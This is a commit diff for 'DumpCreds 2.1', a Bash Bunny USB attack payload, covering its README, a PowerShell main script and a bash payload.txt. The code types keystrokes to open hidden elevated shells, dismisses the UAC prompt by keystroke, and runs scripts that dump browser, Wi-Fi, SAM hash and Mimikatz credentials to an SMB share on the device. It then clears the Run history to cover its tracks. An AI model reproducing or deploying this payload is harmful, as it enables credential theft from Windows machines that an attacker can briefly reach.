Updated DumpCreds for bunny fw v1.1 (#168)
* DumpCreds Version 2.1 - new payload.txt special for BashBunny FW 1.1 - minor changes in main.ps1 - insert some code for debugging * Updadet becaus new fork sync * new payload.txt special for BashBunny FW 1.1 + minor changes in main.ps1 + insert some code for debuggingpull/187/head
parent
7534270a7a
commit
2d651c75f0
|
@ -1,22 +1,34 @@
|
|||
# DumpCreds 2.0
|
||||
# DumpCreds 2.1
|
||||
* Author: QDBA
|
||||
* Version: Version 2.0.2 Build 1003
|
||||
* Target: Windows
|
||||
* Version: Version 2.1.0 Build 1004
|
||||
* Target: Windows 10
|
||||
|
||||
## Description
|
||||
|
||||
** !!!!! works only at Bash Bunny with FW 1.1 !!!!! **
|
||||
|
||||
Dumps the usernames & plaintext passwords from
|
||||
- Browsers (Crome, IE, FireFox)
|
||||
- Wifi
|
||||
- SAM Hashes (only if AdminMode=True)
|
||||
- Mimimk@tz Dump (only if AdminMode=True)
|
||||
- Computerinformation (Hardware Info, Windows ProductKey, Hotfixes, Software, Local, AD Userlist)
|
||||
* Browsers (Crome, IE, FireFox)
|
||||
* Wifi
|
||||
* SAM Hashes (only if AdminMode=True)
|
||||
* Mimimk@tz Dump (only if AdminMode=True)
|
||||
* Computerinformation (Hardware Info, Windows ProductKey, Hotfixes, Software, Local, AD Userlist)
|
||||
|
||||
without
|
||||
- Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock)
|
||||
- Internet connection (becaus Firewall ContentFilter Blocks the download sites)
|
||||
* Use of USB Storage (Because USB Storage ist mostly blocked by USBGuard or DriveLock)
|
||||
* Internet connection (becaus Firewall ContentFilter Blocks the download sites)
|
||||
|
||||
|
||||
# Problems
|
||||
- if you first use the payload on a computer, it will take some time and tries until the drivers are successfully loaded.
|
||||
- If the payload doesnt work. (Red LED or Yellow LED blinks 2 or 4 times) plug off the BB and try it once more (can take 3 or 4 times)
|
||||
- If the payload stops working yellow LED blinks very fast longer than 2min. You get no white LED. Your run in a time out.
|
||||
If you plugin the BB every payload has 1min 30sfor doing the job. At 1min 30s every payload stops. (Thats a FW 1.1 issue)
|
||||
|
||||
# Debug
|
||||
If you want some debug information, create a file with name "DEBUG" in the payload folder
|
||||
you got the debug information in \loot\DumpCred_2.1\log.txt Folder
|
||||
|
||||
|
||||
## Configuration
|
||||
|
||||
|
@ -24,11 +36,6 @@ None needed.
|
|||
|
||||
## Requirements
|
||||
|
||||
Impacket must be installed.
|
||||
Install it from tools_installer payload
|
||||
|
||||
https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/tools_installer
|
||||
|
||||
|
||||
## Download
|
||||
|
||||
|
@ -38,23 +45,45 @@ https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCred
|
|||
|
||||
## Install
|
||||
|
||||
Copy payload.txt, main.ps1 and the complete PS Folder to your favorite switch direcrory.
|
||||
1. Put Bash Bunny in arming mode
|
||||
|
||||
2. Coppy All Folders into the root of Bunny Flash Drive
|
||||
Mandatory
|
||||
* payloads/library/DumpCreds_2.1 --> the payload Files
|
||||
* payloads/library/DumpCreds_2.1/PS --> the Powershell scripts for the payload
|
||||
* tools --> impacket tools (provide the smbserver.py) (not neccessary if you had already installed)
|
||||
Not neccessary
|
||||
* docs --> this doc file
|
||||
* languages --> languauge files for DUCKY_LANG
|
||||
|
||||
3. eject Bash Bunny safely!!
|
||||
|
||||
4. Insert Bash Bunny in arming mode ( Impacket and languages will be installed )
|
||||
|
||||
5. Put all Files and Folders to payload from payloads /payloads/library/DumpCreds_2.1 to payloads/switch1 or payloads/switch2
|
||||
|
||||
6. eject Bash Bunny safely
|
||||
|
||||
7. move switch in right position
|
||||
|
||||
8. plugin Bash Bunny and have fun....! :-)
|
||||
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ------------------ | -------------------------------------------- |
|
||||
| White | Give drivers some time for installation |
|
||||
| Red Blink Fast | Impacket not found |
|
||||
| Red Blink Slow | Target did not acquire IP address |
|
||||
| Amber Blink Fast | Initialization |
|
||||
| Amber | HID Stage |
|
||||
| Purple Blink Fast | Wait for IP coming up |
|
||||
| Purple Blink Slow | Wait for Handshake (SMBServer Coming up) |
|
||||
| Purple / Amber | Powershell scripts running |
|
||||
| RED | Error in Powershell Scripts |
|
||||
| ----------------------- | -------------------------------------------- |
|
||||
| Magenta Solid | Setup |
|
||||
| Red slow blink | Impacket not found |
|
||||
| Red fast blink | Target did not acquire IP address |
|
||||
| Yellow single blink | Initialization |
|
||||
| Yellow double blink | HID Stage |
|
||||
| Yellow triple blink | Wait for IP coming up |
|
||||
| Yellow quad blink | Wait for Handshake (SMBServer Coming up) |
|
||||
| Yellow very fast blink | Powershell scripts running |
|
||||
| White fast blink | Cleanup, copy Files to <root>/loot |
|
||||
| Green | Finished |
|
||||
| ------------------ | -------------------------------------------- |
|
||||
| ----------------------- | -------------------------------------------- |
|
||||
|
||||
|
||||
## Discussion
|
||||
|
@ -67,13 +96,7 @@ to......
|
|||
|
||||
https://github.com/EmpireProject/Empire Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1, Get-ChromeCreds.ps1
|
||||
|
||||
## Changelog
|
||||
|
||||
## ToDo
|
||||
|
||||
- paralellize Creds gathering with PS -- check
|
||||
- while Bashbunny is waiting for Target finished the script it can some other nice work. i.e. nmap the target.
|
||||
(Not very useful at ths time because I'm still Admin on Computer)
|
||||
- remove the modifications of the Powersploit scripts, so you can download and use the original Files. (At the moment you must use my scripts) (and in future)
|
||||
- rewrite some code of the payload so the payload will work no matter if you have admin rights (UAC MsgBox) or not (Credentials MsgBox) -- check
|
||||
(There is no exploitation. You will not get admin rights, but it passes sucessfully never mind if there is a Credential prompt or a UAC prompt)
|
||||
- Maybe! If Target is in a AD Domain and Mimik@tz give us some Passwords try to get some more information about the AD Domain
|
||||
- Complete new payload.txt code for BashBunny 1.1
|
||||
- Added a lot of debug cod into the payload
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
|
||||
<#
|
||||
.SYNOPSIS
|
||||
DumpCred 2.0
|
||||
DumpCred 2.1
|
||||
.DESCRIPTION
|
||||
Dumps all Creds from a PC
|
||||
.PARAMETER <paramName>
|
||||
|
@ -10,8 +10,8 @@
|
|||
DumpCred
|
||||
#>
|
||||
|
||||
$_Version = "2.0.2"
|
||||
$_BUILD = "1003"
|
||||
$_Version = "2.1.0"
|
||||
$_BUILD = "1004"
|
||||
|
||||
# Share on bashbunny
|
||||
$SHARE="\\172.16.64.1\e"
|
||||
|
@ -70,37 +70,42 @@ $LINE3 | Add-Content $TMPFILE
|
|||
Stop-Job *
|
||||
Remove-Job *
|
||||
|
||||
# Start all Jobs as background jobs
|
||||
Write-Host "Wifi-Cred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-WiFiCreds.ps1} | Out-Null
|
||||
Write-Host "ChromeCred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-ChromeCreds.ps1} | Out-Null
|
||||
Write-Host "IECred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-IECreds.ps1} | Out-Null
|
||||
Write-Host "FireFoxCred" ; start-job -RunAs32 -ArgumentList $SHARE {param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-FoxDump.ps1} | Out-Null
|
||||
Write-Host "Inventory" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-Inventory.ps1} | Out-Null
|
||||
Write-Host "Wifi-Cred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-WiFiCreds.ps1} -ErrorAction SilentlyContinue | Out-Null
|
||||
Write-Host "ChromeCred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-ChromeCreds.ps1} -ErrorAction SilentlyContinue | Out-Null
|
||||
Write-Host "IECred" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-IECreds.ps1} -ErrorAction SilentlyContinue | Out-Null
|
||||
Write-Host "FireFoxCred" ; start-job -RunAs32 -ArgumentList $SHARE {param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-FoxDump.ps1} -ErrorAction SilentlyContinue | Out-Null
|
||||
Write-Host "Inventory" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Get-Inventory.ps1} -ErrorAction SilentlyContinue | Out-Null
|
||||
if ($isAdmin) {
|
||||
Write-Host "Hashes" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Invoke-PowerDump.ps1} | Out-Null
|
||||
Write-Host "M1m1k@tz" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Invoke-M1m1k@tz.ps1} | Out-Null
|
||||
Write-Host "Hashes" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\Invoke-PowerDump.ps1} -ErrorAction SilentlyContinue | Out-Null
|
||||
Write-Host "M1m1k@tz" ; start-job -ArgumentList $SHARE {Param($SHARE); powershell -WindowStyle Hidden -Exec Bypass $SHARE\PS\invoke-m1m1d0gz.ps1} -ErrorAction SilentlyContinue | Out-Null
|
||||
}
|
||||
|
||||
Write-host "... Wait for end of jobs"
|
||||
# Wait for all jobs
|
||||
Get-Job | Wait-Job | Out-Null
|
||||
Get-Job | Wait-Job
|
||||
|
||||
Write-host "... Receiving results"
|
||||
# Receive all results
|
||||
Get-Job | Receive-Job | Out-File -Append $TMPFILE
|
||||
|
||||
|
||||
|
||||
|
||||
#Move TMP File to Bunny
|
||||
Write-host "Moving file to bunny"
|
||||
move-item $TMPFILE -Destination $FILE -Force -ErrorAction SilentlyContinue
|
||||
|
||||
# Cleanup
|
||||
# Remove Run History
|
||||
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
|
||||
|
||||
Write-host "... Rename CON_OK to CON_EOF"
|
||||
# Rename CON_OK to CON_EOF so bunny knows that all the stuff has finished
|
||||
Rename-Item -Path "$SHARE\CON_OK" -NewName "$SHARE\CON_EOF"
|
||||
|
||||
# Kill cmd.exe
|
||||
Write-host "... Kill cmds"
|
||||
# Kill cmde.exe
|
||||
Stop-Process -name cmd -ErrorAction SilentlyContinue
|
||||
|
||||
Write-host "... Remove all Jobs"
|
||||
# Remove all Jobs from Joblist
|
||||
Remove-Job *
|
|
@ -1,79 +1,84 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: DumpCreds 2.0
|
||||
# Title: DumpCreds 2.1
|
||||
# Author: QDBA
|
||||
# Version: 2.0.2
|
||||
# Build: 1001
|
||||
# Version: 2.1.0
|
||||
# Build: 1004
|
||||
# Category: Exfiltration
|
||||
# Target: Windows Windows 7 + 10 (Powershell)
|
||||
# Target: Windows Windows 10 (Powershell)
|
||||
# Attackmodes: HID, Ethernet
|
||||
# !!! works only with Bash Bunny FW 1.1 and up !!!
|
||||
#
|
||||
#
|
||||
# White................Wait for driver installation
|
||||
# Red Blink Fast.......Impacket not found
|
||||
# Red Blink Slow.......Target did not acquire IP address
|
||||
# Amber Blink Fast.....Initialization
|
||||
# Amber................HID Stage
|
||||
# Purple Blink Fast....Wait for IP coming up
|
||||
# Purple Blink Slow....Wait for Handshake (SMB Server Coming up)
|
||||
# Purple / Amber ......Powershell scripts running
|
||||
# RED..................Error in Powershell scripts
|
||||
# Green................Finished
|
||||
#
|
||||
# OPTIONS
|
||||
# LED Status
|
||||
# ----------------------- + --------------------------------------------
|
||||
# SETUP + Setup
|
||||
# FAIL + No /tools/impacket/examples/smbserver.py found
|
||||
# FAIL2 + Target did not acquire IP address
|
||||
# Yellow single blink + Initialization
|
||||
# Yellow double blink + HID Stage
|
||||
# Yellow triple blink + Wait for IP coming up
|
||||
# Cyan inv single blink + Wait for Handshake (SMBServer Coming up)
|
||||
# Cyan inv quint blink + Powershell scripts running
|
||||
# White fast blink + Cleanup, copy Files to <root>/loot
|
||||
# Green + Finished
|
||||
# ----------------------- + --------------------------------------------
|
||||
|
||||
logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #############################"
|
||||
|
||||
|
||||
###### Lets Start ####
|
||||
LED SETUP
|
||||
|
||||
# Source bunny_helpers.sh to get environment variables
|
||||
source bunny_helpers.sh
|
||||
|
||||
# Some Variables
|
||||
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
|
||||
LOOTDIR=$SWITCHDIR/loot
|
||||
mkdir -p $LOOTDIR >/dev/null
|
||||
|
||||
|
||||
# Initialization
|
||||
LED R G 100
|
||||
|
||||
|
||||
# Check for impacket. If not found, blink fast red.
|
||||
if [ ! -f pentest/impacket/examples/smbserver.py ]; then
|
||||
LED R 100
|
||||
exit 1
|
||||
# if the file DEBUG in payload folder exist, enter debug mode
|
||||
if [ -f $SWITCHDIR/DEBUG ];then
|
||||
DEBUG=1 # 1= Debug on / 0= Debug off
|
||||
tail -f /var/log/syslog > /tmp/log.txt &
|
||||
else
|
||||
DEBUG=0
|
||||
fi
|
||||
|
||||
mkdir -p $LOOTDIR
|
||||
|
||||
REQUIRETOOL impacket
|
||||
|
||||
# remove old Handshake Files
|
||||
rm -f $SWITCHDIR/CON_*
|
||||
|
||||
|
||||
# HID STAGE
|
||||
# Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1.
|
||||
LED R G B
|
||||
logger -t DumpCred_2.1 "### Enter HID Stage ###"
|
||||
LED STAGE1
|
||||
ATTACKMODE HID
|
||||
|
||||
Q SET_LANGUAGE DE
|
||||
export DUCKY_LANG=de
|
||||
|
||||
# Give some time for driver installation
|
||||
Q DELAY 25000
|
||||
Q DELAY 5000
|
||||
|
||||
LED R G 100
|
||||
# Launch initial cmd
|
||||
Q GUI r
|
||||
if [ $DEBUG -eq 1 ]; then
|
||||
RUN WIN cmd
|
||||
else
|
||||
RUN WIN cmd /k mode con lines=1 cols=100
|
||||
fi
|
||||
|
||||
# Launch powershell as admin (red window)
|
||||
Q DELAY 1000
|
||||
Q STRING cmd /k mode con lines=1 cols=180
|
||||
if [ $DEBUG -eq 1 ]; then
|
||||
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f'-Verb runAs"
|
||||
else
|
||||
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f /k mode con lines=1 cols=100' -Verb runAs"
|
||||
fi
|
||||
Q DELAY 500
|
||||
Q ENTER
|
||||
|
||||
|
||||
# Launch powershell as admin and deletes Run history
|
||||
#Q GUI r
|
||||
Q DELAY 1000
|
||||
#Q STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=180' -Verb runAs"
|
||||
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/k mode con lines=1 cols=180' -Verb runAs"
|
||||
Q DELAY 500
|
||||
Q ENTER
|
||||
|
||||
# Bypass UAC :: Change "ALT j" according to your language i.e. for us it is ALT o
|
||||
# Bypass UAC :: Change "ALT j" according to your language i.e. for us it is ALT o
|
||||
# Bypass UAC :: Change "ALT j" and "ALT n" according to your language i.e. for us it is ALT o (OK) and ALT c (cancel)
|
||||
|
||||
# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline
|
||||
# now the second powershell command goes to the admin cmd windows.
|
||||
|
@ -90,59 +95,74 @@ Q ALT n
|
|||
Q DELAY 500
|
||||
Q ENTER
|
||||
|
||||
LED R G
|
||||
LED STAGE2
|
||||
# Wait for Bunny Ethernet and Start main.ps1 Powershell Script
|
||||
Q DELAY 500
|
||||
if [ $DEBUG -eq 1 ]; then
|
||||
Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1 9> 1> %TEMP%\pslog.tmp } }\""
|
||||
else
|
||||
Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1; exit } }\""
|
||||
fi
|
||||
Q DELAY 1000
|
||||
Q ENTER
|
||||
|
||||
|
||||
|
||||
logger -t DumpCred_2.1 "### Enter Ethernet Stage ###"
|
||||
# Ethernet Tage
|
||||
LED R B 1
|
||||
LED STAGE3
|
||||
ATTACKMODE RNDIS_ETHERNET
|
||||
# Source bunny_helpers.sh to get environment variables
|
||||
source bunny_helpers.sh
|
||||
|
||||
|
||||
logger -t DumpCred_2.1 "### Start SMBServer ###"
|
||||
# Start SMB Server
|
||||
/pentest/impacket/examples/smbserver.py e $SWITCHDIR &
|
||||
/tools/impacket/examples/smbserver.py e $SWITCHDIR &
|
||||
|
||||
# Give target a chance to start exfiltration
|
||||
sleep 2
|
||||
|
||||
# Here you can do anything else except but do not change the ATTACKMODE or umount /root/udisk
|
||||
|
||||
|
||||
|
||||
GET TARGET_IP
|
||||
# Check target IP address. If unset, blink slow red.
|
||||
if [ -z "${TARGET_IP}" ]; then
|
||||
LED R 1000
|
||||
exit 1
|
||||
LED FAIL2
|
||||
logger -t DumpCred_2.1 "### No Target_IP ###"
|
||||
logger -t DumpCred_2.1 "### Failed ###"
|
||||
exit
|
||||
fi
|
||||
logger -t DumpCred_2.1 "### TARGET_IP: " $TARGET_IP " ###"
|
||||
|
||||
LED R B 1000
|
||||
LED STAGE4
|
||||
# Handshake Bunny and Computer
|
||||
while ! [ -f $SWITCHDIR/CON_REQ ]; do
|
||||
logger -t DumpCred_2.1 "### Loop Handshake: waiting to CON_REQ ###"
|
||||
sleep 1
|
||||
done
|
||||
mv $SWITCHDIR/CON_REQ $SWITCHDIR/CON_OK
|
||||
LED R B
|
||||
|
||||
LED Y VERYFAST
|
||||
# Wait until CON_EOF - Computer set it if all is ready
|
||||
while ! [ -f $SWITCHDIR/CON_EOF ]; do
|
||||
LED R B
|
||||
sleep 1
|
||||
LED R G
|
||||
sleep 1
|
||||
if [ -f $SWITCHDIR/CON_ERR ]; then
|
||||
rm $SWITCHDIR/CON_ERR
|
||||
LED R
|
||||
exit 2
|
||||
fi
|
||||
logger -t DumpCred_2.1 "### Loop Handshake: waiting to CON_EOF ###"
|
||||
sleep 2
|
||||
done
|
||||
rm $SWITCHDIR/CON_EOF
|
||||
sync; sleep 1; sync
|
||||
|
||||
LED G
|
||||
LED CLEANUP
|
||||
# Cleanup
|
||||
logger -t DumpCred_2.1 "### cleanup and copy files ###"
|
||||
if ! [ -d /root/udisk/loot/DumpCred_2.1 ]; then
|
||||
mkdir -p /root/udisk/loot/DumpCred_2.1
|
||||
fi
|
||||
mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1
|
||||
rmdir $LOOTDIR
|
||||
rm -f $SWITCHDIR/CON_EOF
|
||||
|
||||
logger -t DumpCred_2.1 "######################## End payload DumpCred_2.1 ##########################"
|
||||
|
||||
# realy the end....
|
||||
if [ $DEBUG -eq 1 ]; then
|
||||
killall tail
|
||||
cp /tmp/log.txt /root/udisk/loot/DumpCred_2.1/
|
||||
fi
|
||||
|
||||
ATTACKMODE RNDIS_ETHERNET STORAGE
|
||||
sync; sleep 1; sync
|
||||
LED FINISH
|
Loading…
Reference in New Issue